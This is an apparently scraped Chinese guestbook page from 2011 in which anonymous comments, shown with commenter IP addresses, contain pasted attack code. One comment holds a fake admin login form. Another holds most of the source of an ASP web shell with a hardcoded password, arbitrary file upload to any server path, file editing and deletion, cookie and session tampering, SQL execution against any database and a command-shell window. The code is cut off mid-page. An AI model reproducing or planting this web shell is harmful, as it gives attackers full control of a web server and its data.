评论人:匿名 时间: 2011/2/25 12:54:03 IP:221.12.22.160- 不错
- 评论人:匿名 时间: 2011/2/22 11:49:41 IP:116.7.17.96
- <style type="text/css">input {font-family: "Verdana";font-size: "11px";BACKGROUND-COLOR: "#FFFFFF";height: "18px";border: "1px solid #666666";}</style><table width="416" border="0" align="center" cellpadding="0" cellspacing="0"><form method="POST" action=""><tr><td height="75" align="center"><span style="font-size: 11px; font-family: Verdana">pass: </span><input name="adminpass" type="password" size="20"><input type="hidden" name="do" value="login"><input type="submit" value="登陆"></td></tr></form></table>.
- 评论人:匿名 时间: 2011/2/22 11:44:57 IP:116.7.17.96
- <br><% response.buffer=true filename=Request.ServerVariables("URL")
Server.ScriptTimeout=5000
On Error Resume Next
userpass="4216301"
Dim oUpFileStream
Class UpFile_Class
Dim Form,File
Public Sub GetDate (RetSize)
Dim RequestBinDate,sSpace,bCrLf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,oFileInfo
Dim iFileSize,sFilePath,sFileType,sFormValue,sFileName
Dim iFindStart,iFindEnd
Dim iFormStart,iFormEnd,sFormName
If Request.TotalBytes < 1 Then
Err = 1
Exit Sub
End If
If RetSize > 0 Then
If Request.TotalBytes > RetSize Then
Err = 2
Exit Sub
End If
End If
Set Form = Server.CreateObject ("Scripting.Dictionary")
Form.CompareMode = 1
Set File = Server.CreateObject ("Scripting.Dictionary")
File.CompareMode = 1
Set tStream = Server.CreateObject ("Adodb.Stream")
Set oUpFileStream = Server.CreateObject ("Adodb.Stream")
oUpFileStream.Type = 1
oUpFileStream.Mode = 3
oUpFileStream.Open
oUpFileStream.Write Request.BinaryRead (Request.TotalBytes)
oUpFileStream.Position = 0
RequestBinDate = oUpFileStream.Read
iFormEnd = oUpFileStream.Size
bCrLf = ChrB (13) & ChrB (10)
取得每个项目之间的分隔符
sSpace = MidB (RequestBinDate,1, InStrB (1,RequestBinDate,bCrLf)-1)
iStart = LenB (sSpace)
iFormStart = iStart+2
分解项目
Do
iInfoEnd = InStrB (iFormStart,RequestBinDate,bCrLf & bCrLf)+3
tStream.Type = 1
tStream.Mode = 3
tStream.Open
oUpFileStream.Position = iFormStart
oUpFileStream.CopyTo tStream,iInfoEnd-iFormStart
tStream.Position = 0
tStream.Type = 2
tStream.CharSet = "gb2312"
sInfo = tStream.ReadText
iFormStart = InStrB (iInfoEnd,RequestBinDate,sSpace)-1
iFindStart = InStr (22,sInfo,"name=""",1)+6
iFindEnd = InStr (iFindStart,sInfo,"""",1)
sFormName = Mid (sinfo,iFindStart,iFindEnd-iFindStart)
If InStr (45,sInfo,"filename=""",1) > 0 Then
Set oFileInfo = new FileInfo_Class
iFindStart = InStr (iFindEnd,sInfo,"filename=""",1)+10
iFindEnd = InStr (iFindStart,sInfo,"""",1)
sFileName = Mid (sinfo,iFindStart,iFindEnd-iFindStart)
oFileInfo.FileName = Mid (sFileName,InStrRev (sFileName, "\")+1)
oFileInfo.FilePath = Left (sFileName,InStrRev (sFileName, "\"))
oFileInfo.FileExt = Mid (sFileName,InStrRev (sFileName, ".")+1)
iFindStart = InStr (iFindEnd,sInfo,"Content-Type: ",1)+14
iFindEnd = InStr (iFindStart,sInfo,vbCr)
oFileInfo.FileType = Mid (sinfo,iFindStart,iFindEnd-iFindStart)
oFileInfo.FileStart = iInfoEnd
oFileInfo.FileSize = iFormStart -iInfoEnd -2
oFileInfo.FormName = sFormName
file.add sFormName,oFileInfo
else
tStream.Close
tStream.Type = 1
tStream.Mode = 3
tStream.Open
oUpFileStream.Position = iInfoEnd
oUpFileStream.CopyTo tStream,iFormStart-iInfoEnd-2
tStream.Position = 0
tStream.Type = 2
tStream.CharSet = "gb2312"
sFormValue = tStream.ReadText
If Form.Exists (sFormName) Then
Form (sFormName) = Form (sFormName) & ", " & sFormValue
else
form.Add sFormName,sFormValue
End If
End If
tStream.Close
iFormStart = iFormStart+iStart+2
Loop Until (iFormStart+2) = iFormEnd
RequestBinDate = ""
Set tStream = Nothing
End Sub
End Class
Class FileInfo_Class
Dim FormName,FileName,FilePath,FileSize,FileType,FileStart,FileExt
Public Function SaveToFile (Path)
On Error Resume Next
Dim oFileStream
Set oFileStream = CreateObject ("Adodb.Stream")
oFileStream.Type = 1
oFileStream.Mode = 3
oFileStream.Open
oUpFileStream.Position = FileStart
oUpFileStream.CopyTo oFileStream,FileSize
oFileStream.SaveToFile Path,2
oFileStream.Close
Set oFileStream = Nothing
End Function
Public Function FileDate
oUpFileStream.Position = FileStart
FileDate = oUpFileStream.Read (FileSize)
End Function
End Class
if request("up")="yes" then
set upload=new UpFile_Class
upload.GetDate (1024*1024)
for each formName in upload.file
set file=upload.file(formName)
if file.FileSize>0 then
if instr(upload.form("filepath"),":")>0 then
savepath=upload.form("filepath")
else
savepath=Server.mappath(upload.form("filepath"))
end if
file.SaveToFile savepath
response.write "上传成功!上传后的路径为"&savepath&"
"
end if
set file=nothing
next
set upload=nothing
showerr()
response.end
end if
%>
<center>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title><%=proname%></title>
<style type="text/css">
<!--
td,textarea,body{
font-size:9pt;
}
table{
background-color: #ffffff;
border-top: 1px solid #cccccc;
border-right: 1px solid #666666;
border-bottom: 1px solid #666666;
border-left: 1px solid #cccccc;
}
input{
background-color: #efefef;
border-top: 1px solid #cccccc;
border-right: 1px solid #666666;
border-bottom: 1px solid #666666;
border-left: 1px solid #cccccc;
}
.small{font-size:8pt}
-->
</style>
<script language="javascript">
function yesok(){
if (confirm("确认要执行此操作吗?"))
return true;
else
return false;
}
function show(page,ptitle,w,h)
{
window.open(page,ptitle,"toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=yes,width="+w+",height="+h);
}
</script>
<%
Dim userpass,Conn,ConnStr,SQL,Help,dbp
repage=request.servervariables("http_referer")
if instr(repage,filename)=0 then repage=filename
if request.form("loginpass")<>"" then
logincheck(request.form("loginpass"))
showerr()
response.end
end if
if session("xl")<>userpass then
loginform()
showerr()
response.end
end if
if request.querystring("logout")="yes" then
logout()
showerr()
response.end
end if
if request("showpath")="yes" then
searchpath()
showerr()
response.end
end if
if request("editpath")<>"" then
edittxtfile(request("editpath"))
showerr()
response.end
end if
if request.form("textpath")<>"" then
call modifyfile(request.form("textpath"))
showerr()
response.end
end if
if request("delpath")<>"" then
call deletefile(request("delpath"))
showerr()
response.end
end if
if request("deldirpath")<>"" then
call deletedir(request("deldirpath"))
showerr()
response.end
end if
if request("copypath")<>"" then
call copyfile(request("copypath"))
showerr()
response.end
end if
if request("upfile")="yes" then
call upfile()
showerr()
response.end
end if
if request("showsc")="yes" then
co1=request.form("co1")
co2=request.form("co2")
cov=request.form("cov")
sess1=request.form("sess1")
sessv=request.form("sessv")
if co1<>"" and co2="" then
Response.Cookies(co1).Expires=Date+30
Response.Cookies(co1)=cov
end if
if request("delsession")<>"" then
session.Contents.Remove(request("delsession"))
response.redirect"?showsc=yes"
response.end
end if
if request("delcookies")<>"" then
Response.Cookies(request("delcookies")).Expires=Date-1
response.redirect"?showsc=yes"
response.end
end if
if co1<>"" and co2<>"" then
Response.Cookies(co1).Expires=Date+30
Response.Cookies(co1)(co2)=cov
end if
if sess1<>"" then
session.abandon
session(sess1)=sessv
end if
showsc()
showerr()
response.end
end if
if request("cmdshell")="yes" then
cmdshell()
response.end
end if
if request.querystring("cleardata")="yes" then
session("dbsourcepath")=""
session("sqlstr")=""
end if
dbp=request("dbsourcepath")
if dbp<>"" then session("dbsourcepath")=trim(dbp)
if instr(session("dbsourcepath"),":")>0 or instr(LCase(session("dbsourcepath")),"sql server")>0 or instr(LCase(session("dbsourcepath")),"dsn=")>0 then
dbp=session("dbsourcepath")
else
dbp=Server.MapPath(session("dbsourcepath"))
end if
sqlstr=trim(request("sqlstr"))
if sqlstr<>"" then session("sqlstr")=sqlstr
Help="在线数据库管理,在线文件管理,CMD命令执行\n"
Help=Help & "文件上传,站内cookie,session管理\n"
%>
<body topmargin="5" onkeydown="if(event.ctrlKey&&event.keyCode==13){form1.Submit.click();}">
<%sub showsc()%>
<table width="700" border="0" cellpadding="0" cellspacing="0">
<form name="form33" method="post" action="">
<tr bgcolor="#003366">
<td height="27"><font color="#FFFFFF"> response.cookies</font><font color="#FFFFFF">("
<input name="co1" value="<%=co1%>" size="15">
")("
<input name="co2" value="<%=co2%>" size="15">
")="
<input name="cov" value="<%=cov%>" size="15">
"
<input name="Submit" type="submit" value="设置COOKIES">
</font></td>
</tr>
</form>
<tr bgcolor="#990000">
<td height="27" bgcolor="#efefef">
<%
response.write"当前本站点保存在你机上的所有COOKIES如下:
"
For Each Item in Request.Cookies
If Request.Cookies(Item).HasKeys Then
For Each ItemKey in Request.Cookies(Item)
Response.Write "<b>response.cookies("&Item &")("&ItemKey&")</b>="& Request.Cookies(Item)(ItemKey)& "<a href=?showsc=yes&delcookies="&item&">删</a>
"
Next
Else
Response.Write "<b>response.cookies("&Item &")</b>="& Request.Cookies(Item) & "<a href=?showsc=yes&delcookies="&item&">删</a>
"
End If
Next
%>
</td>
</tr>
<form name="form22" method="post" action="">
<tr bgcolor="#990000">
<td width="599" height="27"><font color="#FFFFFF"> session("
<input name="sess1" value="<%=sess1%>" size="15">
")="
<input name="sessv" value="<%=sessv%>" size="15">
"
<input name="Submit" type="submit" id="Submit" value="设置SESSION">
</font></td>
</tr>
</form>
<tr bgcolor="#990000">
<td height="27" bgcolor="#efefef">
<%
Response.Write "你在该站点上的SESSION数量: " & Session.Contents.Count&"
"
For Each strName in Session.Contents
If IsArray(Session(strName)) then
For iLoop = LBound(Session(strName)) to UBound(Session(strName))
Response.Write "session("&strName & ")(" & iLoop & ") = " & Session(strName)(iLoop) & "<a href=?showsc=yes&delsession="&strname&">删</a><BR>"
Next
Else
Response.Write "session("&strName & ") = " & Session.Contents(strName) & "<a href=?showsc=yes&delsession="&strname&">删</a><BR>"
End If
next
%>
</td>
</tr>
</table>
<%end sub%>
<table width="700" border="0" cellpadding="0" cellspacing="0">
<form name="form1" method="post" action="<%=filename%>">
<tr>
<td width="581" height="27" colspan="2" align="center">ACCESS数据库路径[相对路径如:database/db.mdb 绝对路径:d:\web\database\db.mdb]
其它连接方式:[如:server=localhost;Database=dbname;Uid=userid;Pwd=password;Driver={SQL SERVER}]
数据库连接串:<input name="dbsourcepath" value="<%=session("dbsourcepath")%>" style="width:450;height:20"></td>
<td width="119" rowspan="2" align="center"> <input name="sp" type="button" id="sp" onClick="show(<%=filename%>?showpath=yes,showfso,300,400)" value="文件" title="管理站内文件">
<input name="scc" type="button" onClick="show(<%=filename%>?upfile=yes,upfile,400,180)" value="上传" title="上传文件到服务器">
<input name="cy2" type="button" onClick="show(<%=filename%>?showsc=yes,showsc,760,200)" value="会话" title="管理站内SESSION,COOKIE">
<input name="cleardata" type="button" id="cleardata" onClick="location=<%=filename%>?cleardata=yes" value="初始">
<input name="cmdshell" type="button" id="cmdshell" onClick="show(<%=filename%>?cmdshell=yes,cmdshell,500,400)" value="CMDSHELL" title="打开CMDSHELL执行窗口">
<input name="help" type="button" value="帮助" onClick="confirm(<%=help%>)" title="显示帮助">
<input name="cy" type="button" onClick="cyyj.style.display=" value="常用" title="显示常用SQL命令按钮">
<input name="clear" type="button" value="清空" onClick="form1.sqlstr.value=" title="清空SQL输入框内容">
<input type="submit" name="Submit" value="执行" onClick="yesok()" title="执行SQL语句,默认是显示数据表名称">
</td>
</tr>
<tr>
<td width="30" height="100" align="center" >SQL
</td>
<td align="center" ><textarea name="sqlstr" style="width:550;height:80"><%=session("sqlstr")%><br>
- 评论人:匿名 时间: 2011/2/22 11:36:58 IP:116.7.17.96
- aaaaaaa
